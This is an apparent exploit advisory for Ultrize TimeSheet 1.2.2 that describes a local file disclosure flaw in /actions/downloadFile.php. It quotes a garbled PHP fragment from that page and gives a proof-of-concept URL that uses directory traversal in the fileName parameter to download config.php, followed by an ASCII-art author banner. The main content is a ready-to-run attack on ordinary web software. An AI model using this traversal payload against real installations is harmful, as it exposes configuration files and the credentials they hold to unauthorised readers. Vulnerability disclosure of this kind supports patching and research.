Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability Code page /actions/downloadFile.php ==== File not found. "; print $fileName; print "
Please make sure your file paths are correct: {$config['upload_dir']}/{$job_id}/$fileName}
"; } ?> ==== Poc /actions/downloadFile.php?fileName=../config.php .___________..______ ____ ____ ___ _______ | || _ \ \ \ / / / \ / _____| `---| |----`| |_) | \ \/ / / ^ \ | | __ | | | / \_ _/ / /_\ \ | | |_ | | | | |\ \----. | | / _____ \ | |__| | |__| | _| `._____| |__| /__/ \__\ \______| ___ ______ ___ _______ _______ .___ ___. ____ ____ / \ / | / \ | \ | ____|| \/ | \ \ / / / ^ \ | ,----' / ^ \ | .--. || |__ | \ / | \ \/ / / /_\ \ | | / /_\ \ | | | || __| | |\/| | \_ _/ / _____ \ | `----./ _____ \ | '--' || |____ | | | | | | /__/ \__\ \______/__/ \__\ |_______/ |_______||__| |__| |__|